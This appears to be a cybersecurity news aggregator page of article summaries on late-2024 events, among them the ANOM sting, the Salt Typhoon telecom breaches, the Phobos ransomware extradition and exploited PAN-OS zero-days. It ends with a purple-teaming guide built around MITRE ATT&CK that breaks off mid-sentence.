Security News

This article examines the importance of having a security culture in business and highlights the numerous benefits of building this type of culture.

by Barracuda

A critical player in one of the world’s largest law enforcement sting operations has been sentenced to 63 months in prison. Osemah Elhassen, an Australian national residing in Colombia, admitted to participating in a global conspiracy to distribute hardened encrypted communication devices - called ANOM - to criminal organizations, facilitating large-scale drug trafficking and money laundering. This sentencing is a significant milestone in ""Operation Trojan Shield,"" a covert international law enforcement initiative that turned the tools of criminals against them. The Trojan Shield Sting The operation, spearheaded by the FBI, involved secretly infiltrating and intercepting an encrypted messaging platform known as ANOM. Marketed as a secure communications tool, ANOM became popular among criminal enterprises seeking to evade law enforcement. However, what its users didn’t know was that FBI had gained backdoor access to it. Over three years, law enforcement agencies intercepted more than 27 million messages between criminal operatives worldwide. These communications provided real-time insights into drug trafficking, arms deals, and other illicit activities, resulting in the arrests of hundreds of individuals globally when the platform was dismantled in June 2021. [caption id=""attachment_93021"" align=""aligncenter"" width=""700""] ANOM encrypted device''s usage worldwide. (Source: FBI)[/caption] Elhassen’s Role in the ANOM Enterprise Elhassen, one of 17 defendants indicted in the U.S. for their involvement in the scheme, pleaded guilty in May 2024 to racketeering conspiracy. Court records detail how Elhassen acted as a key distributor of ANOM devices, targeting criminal syndicates operating across the globe. His actions facilitated the importation and distribution of at least 15 kilograms of cocaine and the laundering of proceeds from illegal activities. According to prosecutors, Elhassen joined the ANOM enterprise in November 2019. Operating out of Colombia, he actively participated in drug trafficking and money laundering while aiding the enterprise’s other illegal objectives, including obstruction of justice. His distribution of ANOM devices played a pivotal role in enabling criminal organizations to coordinate illicit activities securely—or so they thought. A Warning to Criminal Enterprises, But... Law enforcement officials have lauded Operation Trojan Shield as a game-changer in combating organized crime. “This case demonstrates that no criminal network is beyond the reach of international cooperation,” said federal prosecutors. By flipping encrypted communication tools into surveillance assets, law enforcement agencies dismantled numerous criminal enterprises that relied on the illusion of secure communications. The operation also shows the risks criminals face when placing blind trust in technology. Tools like ANOM, which were specifically designed to cater to illicit activities, ultimately became a liability for their users. The success of Operation Trojan Shield raises broader questions about the use of encryption in facilitating crime. While encryption remains a cornerstone of cybersecurity and data privacy, its misuse for illicit purposes complicates the debate over government backdoors and the extent of law enforcement’s reach into encrypted platforms. Critics argue that such operations could set a precedent for governments to exploit encryption technologies, potentially undermining the privacy and security of legitimate users. However, proponents contend that targeted operations like this demonstrate the effectiveness of using innovative methods to tackle organized crime without compromising broader encryption standards. Elhassen’s sentencing sends a clear message to those who profit from enabling criminal enterprises. By participating in the ANOM enterprise, he not only facilitated drug trafficking but also helped perpetuate an ecosystem of crime that endangered communities worldwide. While the dismantling of ANOM and the sentencing of its facilitators represent significant victories for law enforcement, the battle against encrypted criminal networks is far from over. As technology evolves, so do the tactics of criminal enterprises. The challenge for law enforcement will be to stay one step ahead, ensuring that the tools designed to protect privacy are not weaponized for harm. Also read: U.S. Extradites and Charges Alleged Phobos Ransomware Admin

by The Cyber Express

T-Mobile has confirmed that it was hit during a recent wave of telecom network breaches attributed to a China-linked threat group. The Chinese threat group Salt Typhoon was behind earlier confirmed breaches of AT&T, Verizon and Lumen Technologies, using that access to infiltrate the U.S. court wiretap system and target the phone data of top U.S. officials, including President-elect Donald Trump, VP-elect JD Vance, top congressional and government officials, and the campaign of Vice President Kamala Harris. T-Mobile confirmed to the Wall Street Journal that it too was hit in the attacks, but said the breach had limited impact. ""T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information,"" T-Mobile told the Journal. Cisco Routers Said to Be Targeted in T-Mobile, Telecom Hacks Salt Typhoon, also known as Ghost Emperor and UNC2286, accessed U.S. telecom infrastructure through vulnerabilities that included Cisco Systems routers, the WSJ said. The paper said incident investigators suspect the hackers used artificial intelligence or machine learning to further their espionage operations. Some of the targeted networks had been breached for eight months or more in attacks that accessed “call logs, unencrypted texts and some audio from targets,” the Journal said, citing unnamed sources familiar with the matter. Foreign telecom firms were also compromised in the attacks, including in countries that maintain close intelligence ties to the U.S. T-Mobile has now been breached at least nine times in the last six years, according to some counts, leading to huge legal settlements and security and compliance fines. China a Growing Cyber Threat In a statement last week, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) provided an update on their investigation into the telecom network breaches. The agencies said their ongoing investigation into the People''s Republic of China (PRC) attacks on commercial telecommunications infrastructure ""has revealed a broad and significant cyber espionage campaign."" “Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders. We expect our understanding of these compromises to grow as the investigation continues.” The agencies said they continue to provide technical assistance, share information to help other potential targets, “and work to strengthen cyber defenses across the commercial communications sector.” China has been aggressively targeting the U.S. in disinformation campaigns and critical infrastructure compromises. At a MITRE conference last month, CISA Threat Branch Chief Mark Singer said the agency considers China to potentially be a bigger threat than Russia. “The types of incidents that we’ve responded to, the types of intrusions that we’re seeing, this is getting more and more concerning as time goes on,” Singer told conference attendees, calling the threat “a bigger risk” than Russia posed in the leadup to the Ukraine war.

by The Cyber Express

Cybersecurity researchers have shed light on a new stealthy malware loader called BabbleLoader that has been observed in the wild delivering information stealer families such as WhiteSnake and Meduza. BabbleLoader is an ""extremely evasive loader, packed with defensive mechanisms, that is designed to bypass antivirus and sandbox environments to deliver stealers into memory,"" Intezer security

by The Hacker News

Freshly released court documents reveal new details on controversial Israeli spyware firm''s operations.

by Dark Reading

by Dark Reading

Experimental counter-offensive system responds to malicious AI probes with their own surreptitious prompt-injection commands.

by Dark Reading

by Dark Reading

by Dark Reading

How REI Strengthens Security with HackerOne’s Global Security Researcher Community HackerOne Mon, 11/18/2024 - 13:29 Body Q: Please introduce yourself. Tell us what you do at REI and why cybersecurity is important to REI.A: I''m Isaiah Grigsby, a senior application security engineer. I lead our vulnerability disclosure and bug bounty programs, oversee our security tools in our CI/CD pipelines, and provide training for our developers. Cybersecurity is vital to REI because it protects customers'' data and ensures a safe, reliable experience. By prioritizing security, we build trust with our community and uphold the values that define our brand. It’s about creating a secure environment where our customers can confidently engage with us.Q: What were your primary goals when REI launched your bug bounty program? And how have they evolved?A: When we launched our bug bounty program, our primary goal was to enhance our application security strategy. We initially started with a private bug bounty program to establish a foundation for security testing. After a few months of having a successful private bug bounty program, we transitioned to a public vulnerability disclosure program, which allows us to receive and manage vulnerability reports from third-party researchers. As our program has evolved, we''ve also introduced a public bug bounty program, enabling us to leverage the diverse skills of a global community. This progression has been instrumental in maturing our application security efforts and building a world-class security program.Q: Why did REI choose HackerOne to manage its program?A: We chose HackerOne to manage our program because we wanted a trusted platform to enhance our security efforts. Key factors were HackerOne’s strong reputation and expertise in connecting us with a diverse community of ethical hackers.Q: How has HackerOne''s global community of security researchers expanded your security testing capabilities? A: HackerOne’s global community of ethical hackers has broadened our security testing capabilities. We connect with a diverse group of hackers, each bringing their specialties and strengths to the table. This diversity is an essential asset because there’s no one-size-fits-all approach. Some focus on specific attacks, while others excel at identifying a wide range of vulnerabilities across our assets. This variety helps us uncover potential security gaps that we might overlook otherwise. What truly sets the HackerOne community apart is their collaborative spirit and commitment to ethical hacking. They genuinely want to help organizations like ours strengthen our security, and that’s invaluable.Q: Have you had any memorable interactions with hackers to date? Favorite bugs?A: I can’t pick just one favorite interaction because I’m always fascinated by the skills and time hackers invest in learning our systems. One memorable moment was when a hacker compiled an impressive proof of concept for a vulnerability in our membership application process. Their dedication and attention to detail helped us see the issue.What I love most is seeing the creativity hackers bring to the table. Each submission highlights their unique approach and understanding of security, which keeps us on our toes and continually motivates us to enhance our defenses.Q: What REI assets can security researchers test?A: Hackers can test our main asset, rei.com, except for paths we have deemed out of scope in our policy. View our complete list of in-scope and out-of-scope assets.Q: What findings is the team most interested in surfacing?A: At REI, we focus on finding critical vulnerabilities that could affect our customers’ data and overall application security. We pay close attention to issues like authentication and authorization flaws, injection vulnerabilities, and anything that could lead to data breaches. Business logic errors are also a significant concern since they can impact our operations and customer experience. By prioritizing these bugs, we aim to strengthen our security and create a safe, reliable environment for our users.Q: What advice would you give other organizations considering working with security researchers to harden their attack surface?A: If you''re considering using ethical hackers to improve your security, here’s some advice based on what we''ve learned. First, start by clearly defining your goals. Know what specific vulnerabilities or areas you want to focus on.When choosing a platform, look for one that connects you with skilled, ethical hackers with a good reputation and solid community feedback. Communication is key, so provide context about your assets and encourage collaboration to get the best insights.Also, be ready to act on the findings you receive. Set up a process for reviewing reports and prioritize vulnerabilities based on their potential impact so you can fix them quickly. Lastly, consider ethical hacking an ongoing part of your security strategy rather than a one-off project. This proactive mindset will help you build a more robust security framework over time.Q: Anything to say directly to the researcher community?A: Absolutely! Thank you to the hacker community; we appreciate your crucial role in improving our security. Your skills and insights are invaluable in helping organizations like ours spot vulnerabilities we might miss.Keep pushing boundaries and sharing your knowledge. Collaboration is essential; the more we work together, the stronger we all become. Remember, your work protects companies and safeguards users and the broader digital landscape.Keep innovating and challenging the status quo. Your efforts truly make a difference. We’re excited to partner with you on this journey toward a more secure future. Thank you for your commitment to ethical hacking! Excerpt REI''s senior application security engineer discusses their program success, evolving goals, and the value of the security researcher community. Main Image

by HackerOne

The United States secured the extradition of a Russian national from South Korea who is allegedly the mastermind behind the notorious Phobos ransomware. Evgenii Ptitsyn, 42, is accused of administering the Phobos ransomware operation, a malware strain responsible for victimizing over 1,000 public and private entities globally. The ransomware attacks stemming from this malware strain extorted more than $16 million in ransom payments, targeting diverse sectors such as healthcare, education, critical infrastructure, and government services. Ptitsyn, a Russian national arrested in South Korea, made his first appearance in the U.S. District Court for the District of Maryland on November 4. A 13-count indictment charges him with conspiracy, wire fraud, computer hacking, and extortion. Alleged Role in the Phobos Ransomware Scheme The Phobos ransomware model operated as a “ransomware-as-a-service” (RaaS) platform. According to the Department of Justice (DOJ), Ptitsyn functioned as an administrator, facilitating ransomware sales, distribution, and support for affiliates. These affiliates used Phobos ransomware to infiltrate victims'' networks, encrypt sensitive data, and extort payments. Each attack left a ransom note on compromised systems, demanding cryptocurrency payments in exchange for decryption keys. Affiliates were also known to escalate threats, warning victims that stolen data would be published or shared with customers and clients if the ransom wasn’t paid. Ptitsyn and his co-conspirators allegedly operated a darknet platform where affiliates purchased decryption keys, paid fees, and coordinated ransomware attacks. The DOJ identified Ptitsyn’s aliases as “derxan” and “zimmermanx,” which he reportedly used to advertise and facilitate illicit services on underground forums. Arrest and Extradition The indictment and extradition were made possible through an international collaboration involving law enforcement agencies across South Korea, Europe, Japan, and the United States. The FBI’s Baltimore Field Office led the investigation, supported by Europol and the Department of Defense Cyber Crime Center. Deputy Attorney General Lisa Monaco praised the multinational effort that not only led to the dismantling of Phobos ransomware networks but also the arrest of Ptitsyn. “Together with our partners across the globe, we will continue to hold cybercriminals accountable and protect innocent victims,” she said. Principal Deputy Assistant Attorney General Nicole M. Argentieri called out the devastation caused by the global scale of the Phobos operation. She noted that the ransomware targeted not only corporations but also schools, hospitals, and nonprofits, demonstrating the indiscriminate nature of these attacks. Technical Details of Phobos Ransomware Phobos, first observed in 2019, is often deployed against small to medium-sized organizations lacking robust cybersecurity defenses. The ransomware exploits common vulnerabilities, such as stolen credentials and unpatched systems, to gain unauthorized access. Once inside, it encrypts files and appends extensions like .phobos or .adame to affected data. The RaaS model allowed affiliates to share profits with administrators like Ptitsyn, who provided operational support and decryption tools. Cryptocurrency transactions were tracked, with affiliates paying administrators for decryption keys, ensuring a steady revenue stream. Cyber threat intelligence company Cyble told The Cyber Express that they had observed the Phobos ransomware being deployed using another tactic. It was ""commonly distributed through hacked Remote Desktop (RDP) connections, taking advantage of the accessibility and cost efficiency of this dissemination vector,"" Cyble said. One of the most prominent examples of Phobos'' lasting impact was a ransomware attack on Romanian healthcare. ""Motivated by financial gains, threat actors infected the Hipocrate Information System with Phobos ransomware, which then spread to over 100 hospitals and healthcare centers in Romania,"" Cyble stated. A joint federal advisory from February found similar exploitation of exposed RDP connections to gain initial access by the Phobos ransomware operators. The advisory added that Phobos is likely linked to several other variants including Elking, Eight, Devos, Backmydata and Faust ransomware. They were often also observed deploying the SmokeLoader malware before deploying the Phobos variant, likely for reconnaissance. Charges and Legal Ramifications Ptitsyn faces charges of wire fraud, conspiracy to commit computer fraud, intentional damage to protected computers, and extortion. If convicted, he could receive up to 20 years in prison for each wire fraud count and 10 years for each computer hacking offense. U.S. Attorney Erek L. Barron reiterated the government’s commitment to pursuing cybercriminals, stating, “It’s only a matter of time; cybercriminals will be caught and brought to justice.” Impact on Victims and Mitigation Efforts Phobos ransomware’s reach extended across various sectors, disrupting essential services and endangering sensitive data. Victims included healthcare facilities, educational institutions, and critical infrastructure operators. These attacks often forced organizations to pay ransoms to avoid prolonged downtime or public exposure of sensitive information. To counter such threats, the DOJ encourages organizations to adopt proactive cybersecurity measures, including regular backups, strong access controls, and timely software updates. Additional resources for mitigating ransomware attacks are available on StopRansomware.gov, offering guidance from the Cybersecurity and Infrastructure Security Agency (CISA).

by The Cyber Express

by Dark Reading

Other Biden administration appointees at CISA will also submit their resignations on Jan. 20, as the cyberdefense agency prepares for President-elect Trump''s new DHS director.

by Dark Reading

Threat actors are actively exploiting two VMware vCenter Server vulnerabilities tracked as CVE-2024-38812 and CVE-2024-38813, Broadcom warns. Broadcom warns that the two VMware vCenter Server vulnerabilities CVE-2024-38812 and CVE-2024-38813 are actively exploited in the wild. “Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.” […]

by Security Affairs

A vulnerability found in the Really Simple Security plug-in allows an attacker to remotely gain access to any account on an affected website, including the administrator, when 2FA is enabled.

by Dark Reading

A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing…

by Hackread

Summary In early October 2024, EclecticIQ analysts discovered a large-scale phishing campaign targeting e-commerce shoppers in Europe and the USA. This campaign, which capitalized on the heightened online shopping activity around Black Friday, is believed to have been orchestrated by a Chinese financially motivated threat actor, referred to as SilkSpecter. The campaign enticed victims with fake discounted...

by RH-ISAC

Of the numerous victims, at least three refused to pay the demanded ransom, with the rest seemingly in talks with the cybercriminal group.

by Dark Reading

If you''re concerned about your privacy, you should regularly clear your Google search cache on Android. Here''s how to do this manually and set up auto-delete.

by ZDNET Security

A report from the U.S. Environmental Protection Agency’s (EPA) Office of Inspector General has revealed critical cybersecurity vulnerabilities in over 300 water facilities across the country, posing significant risks to public health and economic stability. The report highlights systemic weaknesses in reporting, preparedness, and response mechanisms, leaving drinking water systems susceptible to cyberattacks. Investigation highlights … The post EPA Flags 300 Water Facilities in the U.S. as Vulnerable to Hackers appeared first on CyberInsider.

by Cyber Insider

Bitdefender Labs has uncovered a malicious advertising campaign exploiting Facebook to target Bitwarden users with fake security updates. Launched on November 3, 2024, this campaign impersonates the popular password manager to distribute a harmful browser extension. The attackers use Facebook''s ad platform to deliver seemingly legitimate ads under the guise of a Bitwarden-branded security alert. … The post Facebook Ads Target Bitwarden Users with Malicious Chrome Extension appeared first on CyberInsider.

by Cyber Insider

According to research from GitGuardian and CyberArk, 79% of IT decision-makers reported having experienced a secrets leak, up from 75% in the previous year''s report. At the same time, the number of leaked credentials has never been higher, with over 12.7 million hardcoded credentials in public GitHub repositories alone. One of the more troubling aspects of this report is that over 90% of valid

by The Hacker News

Brave Software has unveiled “Shred,” a powerful new feature in its iOS browser (version 1.71) that allows users to delete site-specific data instantly. Designed to bolster privacy against first-party tracking, Shred provides users with a one-tap solution to erase stored data for individual websites without affecting data for other sites. This development addresses an often-overlooked … The post Brave Launches “Shred” on iOS to Erase Site-Specific Data Instantly appeared first on CyberInsider.

by Cyber Insider

A threat actor has claimed responsibility for breaching Ford Motor Company''s internal database, exposing more than 44,000 customer records. The alleged data shared on a prominent hacking forum includes sensitive details such as customer names, physical locations, and purchased products. The breach was reportedly carried out by a group associated with the notorious hacker IntelBroker, … The post Hacker Claims Breach at Ford Motor Company, Leaks Customer Data appeared first on CyberInsider.

by Cyber Insider

Huntress researchers describe two SafePay ransomware incidents resulting in file encryption and exfiltration.

by SC Media

Explore industry moves and significant changes in the industry for the week of November 18, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

The saga of VMWare’s critical CVE-2024-38812 vCenter Server bug has reached the “exploitation detected” stage. The post VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw appeared first on SecurityWeek.

by SecurityWeek

The tangle of user-built tools is formidable to manage, but it can lead to a greater understanding of real-world business needs.

by Dark Reading

Fresh from the Colorado mountains 🏔️ From a LAN-party optimized house to AI-driven data patterns, PHP security hardening & bug bounty success stories. Plus NeovimConf returns & Anthropic is hiring!

by Hive Five

DocuSign phishing scams surged by 98%, with hundreds of daily attacks impersonating US government agencies like HHS and…

by Hackread

KubeCon + CloudNativeCon North America 2024 celebrated Kubernetes'' 10th anniversary with major announcements, cloud-native certifications, and key updates from CNCF graduated projects.

by ITPro Today

Brave Browser 1.71 for iOS introduces a new privacy-focused feature called ""Shred,"" which allows users to easily delete site-specific mobile browsing data. [...]

by BleepingComputer

The security vendor''s Expedition firewall appliance''s PAN-OS interface tool has racked up four critical security vulnerabilities under active attack in November, leading tit to advise customers to update immediately or and take them off the Internet.

by Dark Reading

What do hijacked websites, fake job offers, and sneaky ransomware have in common? They’re proof that cybercriminals are finding smarter, sneakier ways to exploit both systems and people. This week makes one thing clear: no system, no person, no organization is truly off-limits. Attackers are getting smarter, faster, and more creative—using everything from human trust to hidden flaws in

by The Hacker News

An alarming set of chained vulnerabilities in Palo Alto Networks'' PAN-OS software has sparked concerns that attackers could seize administrator privileges through an authentication bypass. The first vulnerability, identified as CVE-2024-0012, is a flaw that allows unauthenticated users with network access to the management interface to escalate their privileges, tamper with configurations, or exploit other privilege escalation vulnerabilities, including the second bug, CVE-2024-9474. CVE-2024-9474 is a critical part of the exploit operation, potentially contributing to a chained attack scenario. While Palo Alto Networks has acknowledged the CVE, it has not yet provided in-depth technical details about the vulnerability''s mechanics, leaving room for speculation. Palo Alto Networks has confirmed the availability of patches to address these issues and said it is ""tracking a limited set of exploitation activity"" and is ""working with external researchers, partners, and customers to share information transparently and rapidly."" The Scope of the Threat to PAN-OS Palo Alto Networks disclosed that the main vulnerability in the exploit chain - CVE-2024-0012 - affects PAN-OS versions 10.2, 11.0, 11.1, and 11.2. Notably, Cloud NGFW and Prisma Access remain unaffected. The exploitation risk significantly decreases when organizations limit access to the management interface to trusted internal IP addresses as per best practices. Despite these measures, Palo Alto Networks Unit 42 researchers have identified limited exploitation attempts. Dubbed ""Operation Lunar Peek,"" these attacks involve adversaries executing commands interactively and deploying malware, including webshells, on compromised firewalls. Also read: Palo Alto Networks Warns Customers of Actively-Exploited PAN-OS vulnerability PAN-OS Attack Origins and Indicators Threat actors have primarily targeted exposed management web interfaces using IP addresses linked to anonymous VPN services. Palo Alto Networks has published a detailed list of suspicious IPs and associated indicators of compromise (IOCs), enabling organizations to monitor and mitigate potential threats. The list includes IPs such as 91.208.197[.]167 and 136.144.17[.]146, among others. Some post-exploitation payloads, including a PHP webshell (SHA256 hash: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668), have also been detected. Patching Reduces Risk Palo Alto Networks has released patches to address CVE-2024-0012 and CVE-2024-9474 and strongly recommends updating affected devices immediately. Organizations should ensure the management interface is accessible only from trusted internal IPs to block unauthorized external access. For organizations needing further assistance, Palo Alto Networks provides support services. Unit 42 retainer customers can directly contact the threat intelligence team for incident response guidance. Mitigations Beyond Patching Securing the management interface is essential. Palo Alto Networks advises implementing best practice deployment guidelines, which include: Restricting access to trusted internal IP addresses. Avoiding direct exposure of the management interface to the internet. Continuously monitoring for IOCs using threat intelligence feeds. Palo Alto Networks has shared intelligence with the Cyber Threat Alliance (CTA) to strengthen collective defense measures against this exploit. CTA members have leveraged this data to deploy protections and disrupt threat actors systematically. Organizations should act promptly to apply patches, implement network segmentation, and adopt recommended security configurations. For ongoing updates and technical details, refer to the Palo Alto Networks Security Advisory here. Ensure your defenses remain robust as attackers evolve their tactics.

by The Cyber Express

This week on the Lock and Code podcast, we tell three stories about air fryers, smart rings, and vacuums that want your data.

by Malwarebytes Labs

Google appears to be readying a new feature called Shielded Email that allows users to create email aliases when signing up for online services and better combat spam. The feature was first reported by Android Authority last week following a teardown of the latest version of Google Play Services for Android. The idea is to create unique, single-use email addresses that forward the messages to

by The Hacker News

IT leaders know the drill—regulators and cyber insurers demand regular network penetration testing to keep the bad guys out. But here’s the thing: hackers don’t wait around for compliance schedules. Most companies approach network penetration testing on a set schedule, with the most common frequency being twice a year (29%), followed by three to four times per year (23%) and once per year (20%),

by The Hacker News

A new phishing campaign is targeting e-commerce shoppers in Europe and the United States with bogus pages that mimic legitimate brands with the goal of stealing their personal information ahead of the Black Friday shopping season. ""The campaign leveraged the heightened online shopping activity in November, the peak season for Black Friday discounts. The threat actor used fake discounted products

by The Hacker News

Chinese threat actors use a custom post-exploitation toolkit named ''DeepData'' to exploit a zero-day vulnerability in Fortinet''s FortiClient Windows VPN client that steal credentials. [...]

by BleepingComputer

CISA''s director will depart the agency after three years at the helm, as part of the ""seamless transition"" of government power. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.

by Malwarebytes Labs

This webcast was originally published on November 8, 2024. In this video, Hayden Covington discusses the detection engineering process and how to apply the scientific method to improve the quality […] The post The Detection Engineering Process appeared first on Black Hills Information Security.

by Black Hills Information Security

Hackers breached U.S. satellite maker Maxar Space Systems and accessed personal data belonging to its employees, the company informs in a notification to impacted individuals. [...]

by BleepingComputer

The US-based firm said hackers misdirected a $250,000 wire transfer payment that it hasn''t been able to recover. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Palo Alto Networks has finally released security updates for an actively exploited zero-day vulnerability in its Next-Generation Firewalls (NGFW). [...]

by BleepingComputer

Palo Alto Networks says that customer devices could be under threat from an actively-targeted critical security flaw

by SC Media

Spoofs from government agencies target businesses that regularly run DocuSign transactions with U.S. state, municipal and licensing authorities.

by SC Media

The ability to internalize and operationalize customized threat intelligence as part of a holistic security system is no longer a luxury; it''s a necessity. The post Why Custom IOCs Are Necessary for Advanced Threat Hunting and Detection appeared first on SecurityWeek.

by SecurityWeek

Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days. About the vulnerabilities (CVE-2024-0012, CVE-2024-9474) CVE-2024-0012 stems from missing authentication for a critical function and allows unauthenticated attackers with network access to the management web interface “to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474,” according to Palo … More → The post Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) appeared first on Help Net Security.

by Help Net Security

The FreeBSD Foundation, in partnership with the Alpha-Omega Project, has released the results of an extensive security audit of two critical FreeBSD components: the bhyve hypervisor and the Capsicum sandboxing framework. The audit, conducted by the offensive security firm Synacktiv, provides insights into potential vulnerabilities and highlights the importance of proactive security measures in open-source software. The security audit, carried out in June and July 2024, aimed to identify vulnerabilities in these subsystems’ user-mode and … More → The post Major security audit of critical FreeBSD components now available appeared first on Help Net Security.

by Help Net Security

Companies that recognize current market opportunities — from the need to safely implement revolutionary technology like AI to the vast proliferation of cyber threats — have remarkable growth prospects.

by Dark Reading

The Library of Congress discloses the compromise of some of its IT systems, an alleged foreign threat actor hacked their emails. The Library of Congress informed lawmakers about a security breach, an alleged foreign adversary compromised some of their IT systems and gained access to email communications between congressional offices and some library staff, including […]

by Security Affairs

Evgenii Ptitsyn, a Russian national and suspected administrator of the Phobos ransomware operation, was extradited from South Korea and is facing cybercrime charges in the United States. [...]

by BleepingComputer

We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations. The post Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 appeared first on Unit 42.

by Palo Alto Networks - Unit42

Purple team activities serve as a bridge between red and blue teams, combining offensive tactics with defensive strategies to enhance an organization’s overall security posture. Unlike traditional siloed approaches, purple teaming fosters collaboration between attackers (red team) and defenders (blue team) to identify weaknesses, improve detection capabilities, and refine incident response processes.Red TeamThe Red Team simulates real-world adversaries to test an organization’s defenses. Their main goal is to emulate tactics, techniques, and procedures (TTPs) that an actual attacker might use to breach systems. These activities can include penetration testing, social engineering (e.g., phishing campaigns), or advanced exploitation of vulnerabilities.Purpose: Identify weaknesses in security posture.Approach: Offensive and stealthy, often working under conditions that mimic those of genuine threat actors.Outcome: A report detailing successful attack paths and vulnerabilities exploited.Blue TeamThe Blue Team is responsible for protecting the organization’s assets, monitoring for threats, and responding to attacks. They ensure that systems are fortified, continuously monitored, and resilient to threats.Purpose: Detect, prevent, and respond to security incidents.Approach: Defensive and proactive, focusing on incident response, patch management, and continuous monitoring.Outcome: A strong, adaptive defense that mitigates risks identified during operations or by Red Team activities.Purple TeamThe Purple Team is a collaborative unit designed to bridge the gap between Red and Blue Teams. Rather than functioning as an independent team, they often consist of members from both sides working together. The goal is to ensure that the offensive insights of the Red Team directly enhance the defensive measures of the Blue Team.Purpose: Facilitate learning, sharing of techniques, and improvement of security practices.Approach: Cooperative, often using frameworks like MITRE ATT&CK to align activities and prioritize defensive enhancements.Outcome: A continuously evolving security posture where gaps are closed faster, and defenses are enhanced by practical adversarial insights.The Purple Team doesn’t just act as a mediator but ensures that findings from simulated attacks translate into improved detection, prevention, and response mechanisms. They also focus on training the Blue Team using Red Team tactics and fostering a culture of collaboration rather than competition.Importance of Purple TeamingPurple team activities integrate offensive and defensive perspectives to:Uncover Detection Gaps: For example, if a red team executes a lateral movement technique (e.g., Pass-the-Ticket, T1550.003), and the blue team fails to detect it, the gap is identified. A purple team collaborates to create detection rules, such as monitoring Kerberos ticket-granting service usage via SIEM.Test Security Controls: Test IDS/IPS, EDR, and firewalls against known TTPs. If PowerShell Downgrade Attacks (T1059.001) evade detection, the purple team can work to enhance detection by enabling PowerShell transcription logging and adding custom detection rules.Ensure Continuous Improvement: Post-tests, ensure defenses like automated response playbooks (e.g., isolating compromised hosts) are updated to counter TTPs used in simulations.Teams & Tools Involved in Purple TeamingRed Team: Uses tools like Metasploit, Cobalt Strike, or Caldera to simulate attack vectors. Examples: Exploiting remote services (T1021) or launching malware execution (T1204).Blue Team:Monitors SIEM logs (Elastic Stack, Splunk) for anomalies.Examples: Custom Sigma rules for detecting unusual logon patterns (T1078) or privileged access abuse (T1110).Threat Intelligence Team:Provides details about adversary groups like FIN7 or APT29.Guides TTP selection by mapping real-world incidents to MITRE tactics.DevOps Team:Implements technical changes, such as updating configurations or deploying additional logging (e.g., enabling Sysmon for Windows event logging).Use of the MITRE ATT&CK FrameworkThe MITRE ATT&CK framework aids in systematically mapping attack scenarios.Adversary Mapping:Select a threat group, such as FIN7.Use MITRE ATT&CK Navigator to focus on their common techniques, e.g., Credential Dumping (T1003) or Phishing (T1566).Gap Analysis:Use MITRE Navigator to highlight covered and uncovered TTPs.Example: If Command and Control (T1071) techniques are uncovered, prioritize these in red team simulations.Visualization:MITRE Navigator lets you create heatmaps of detection gaps.Example:{ "name": "Detection Coverage", "layers": [ { "techniqueID": "T1059", "color": "#ff0000", "comment": "Requires logging improvements." } ]}Approaches to Decide Which TTPs to Use in Purple TeamingVulnerability Management Data:Map unresolved vulnerabilities (e.g., missing patches) to MITRE TTPs.Example: If Privilege Escalation (T1068) is a common weakness, simulate this using tools like Caldera.Sample Qualysguard data to map open vulnerabilities in own infrastructure to MITRE TTPsHunt Model Gaps:Hunt models define how an organization searches for specific threats across different MITRE ATT&CK phases. Gaps occur when certain TTPs or phases have:Limited or no detection coverage.Weak hunting hypotheses or playbooks.Inadequate telemetry or visibility into attack activity.These gaps represent blind spots that adversaries could exploit, making them high-priority areas for Purple Team activities.Why Focus on Hunt Model Gaps?Addressing Real-World Threats: Gaps in hunt models indicate areas where an organization’s defenses are weakest. By focusing on these gaps, Purple Teams ensure that resources are directed toward fixing the most pressing vulnerabilities. For example: If the hunt model lacks detection for Initial Access techniques (e.g., spear phishing or malicious macros), the Purple Team can focus on simulating these TTPs and refining Blue Team responses.Efficient Use of Resources: Security teams often have limited time and personnel. Prioritizing TTPs based on hunt model gaps avoids wasting resources on well-covered phases, ensuring that efforts are spent where they are needed most.Improving Detection and Hunting Maturity: Running Purple Team activities on uncovered TTPs strengthens both proactive hunting (hypotheses and playbooks) and reactive detection (SIEM rules, alerts). This helps SOCs evolve their maturity and preparedness.Validating and Closing Gaps: By simulating TTPs that correspond to hunt model gaps, organizations can validate their ability to detect and respond to those techniques, ensuring that defensive improvements are measurable and effective.Example Use Case:Scenario:A hunt model gap is identified in the Execution phase, specifically around PowerShell-based attacks.Steps Taken:Red Team Activity: Simulate common PowerShell attack techniques like Invoke-Mimikatz or Download Cradle.Blue Team Effort: Detect anomalies such as suspicious PowerShell commands or unusual process chains.Outcome:Enhanced hunt playbooks for PowerShell abuse.Improved detection rules in EDR and SIEM.Mitigation of the gap in the hunt model.Recent Industry Breaches:To select the most relevant TTPs for a Purple Team activity, analyzing recent breaches provides a real-world perspective on the techniques adversaries are currently using. This approach ensures that the organization’s defenses are tested against threats it is most likely to face.Why Analyze Recent Breaches?Relevance to Industry Trends:Breaches in a specific industry often reveal patterns in attack techniques targeting similar organizations. For example, attackers targeting the financial sector may use credential stuffing (T1110.004) due to the prevalence of login portals.Learning from Peer Incidents:Examining breaches in other organizations allows you to anticipate potential attack vectors, even if they haven’t been exploited in your environment yet.Contextual TTP Selection:The TTPs observed in recent 